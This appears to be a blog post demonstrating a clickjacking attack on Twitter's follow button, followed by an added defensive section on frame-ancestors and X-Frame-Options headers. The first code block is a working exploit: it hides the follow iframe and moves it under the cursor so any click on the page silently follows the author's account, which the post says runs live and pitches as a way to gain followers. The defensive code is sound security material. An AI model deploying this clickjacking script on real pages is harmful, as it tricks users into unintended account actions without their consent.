Today Twitter released a new follow button which lets you instantly follow a user by clicking it, as long as you are logged in. You don't need to go to the Twitter website to follow; everything is done through an iframe.
It looks like we can do a clickjacking attack on this iframe. Here is how it works:
- You set the iframe fully transparent/invisible via CSS.
- You capture the mouse events.
- When the user moves the mouse, you move the Twitter button iframe so that it always stays under the cursor.
- If the user clicks anywhere on your page, he will automatically follow your account.
- You gain more followers; girls love you.
The hack is running on this page; I've just set the opacity to 40% to make you realize you are getting owned. Just click somewhere and you will automatically follow me.
```javascript
// Fallback for old browsers without getElementsByClassName (returns the first match only)
if (!document.getElementsByClassName) {
  document.getElementsByClassName = function (classname) {
    var all = document.getElementsByTagName("*");
    for (var i = 0; i < all.length; i++) {
      if (all.item(i).className == classname) {
        return new Array(all.item(i));
      }
    }
  };
}

// The iframe injected by Twitter's follow button script
var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];

// Take the iframe out of the page flow and make it (nearly) invisible
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)'; // old IE

// Keep the button under the cursor wherever the mouse goes
document.onmousemove = function (e) {
  if (!e) e = window.event;
  // 'px' is required in standards mode; unitless values are ignored there
  twitterFollowIframe.style.left = (e.clientX - 20) + 'px';
  twitterFollowIframe.style.top = (e.clientY - 10) + 'px';
};
```
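For the site that serves such a button, the standard defence is to tell browsers which origins may frame it. The block below is an added example, not code from the original post or from Twitter: it builds those response headers and models, in simplified form, how a browser evaluates them. The origins, function names and header values are assumptions for the demonstration.

```javascript
// Added example (not from the original post): how a site serving a
// follow-style endpoint can state who may frame it, and a simplified
// model of the browser's evaluation of those headers. Not a library API.

// Build the headers for a page that must only be framed by trusted origins.
// An empty allow-list means "never frame this page".
function frameProtectionHeaders(allowedOrigins) {
  if (allowedOrigins.length === 0) {
    return {
      'X-Frame-Options': 'DENY',
      'Content-Security-Policy': "frame-ancestors 'none'",
    };
  }
  // X-Frame-Options cannot express a list of third-party origins, so the
  // CSP directive carries the allow-list and XFO only covers same-origin.
  return {
    'X-Frame-Options': 'SAMEORIGIN',
    'Content-Security-Policy': "frame-ancestors 'self' " + allowedOrigins.join(' '),
  };
}

// Decide whether a frame hosted on embedderOrigin may show a response
// served by selfOrigin. A frame-ancestors directive, when present, takes
// precedence over X-Frame-Options, as it does in current browsers.
function isFramingAllowed(headers, selfOrigin, embedderOrigin) {
  const csp = headers['Content-Security-Policy'] || '';
  const m = csp.match(/frame-ancestors\s+([^;]+)/);
  if (m) {
    const sources = m[1].trim().split(/\s+/);
    if (sources.includes("'none'")) return false;
    if (sources.includes('*')) return true;
    if (sources.includes("'self'") && embedderOrigin === selfOrigin) return true;
    return sources.includes(embedderOrigin);
  }
  const xfo = (headers['X-Frame-Options'] || '').toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return embedderOrigin === selfOrigin;
  return true; // no header at all: any page may frame it, as in the post above
}

// Constructed sample: the widget origin and two embedders
const WIDGET = 'https://widget.example';
console.log(isFramingAllowed(frameProtectionHeaders([]), WIDGET, 'https://other.example')); // false
console.log(isFramingAllowed({}, WIDGET, 'https://other.example')); // true
```

A button that is meant to be embedded on any site cannot use these headers, so there the one-click state change itself has to move out of the frame (for example behind a confirmation in a top-level window).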
Categories: clickjacking attack, Twitter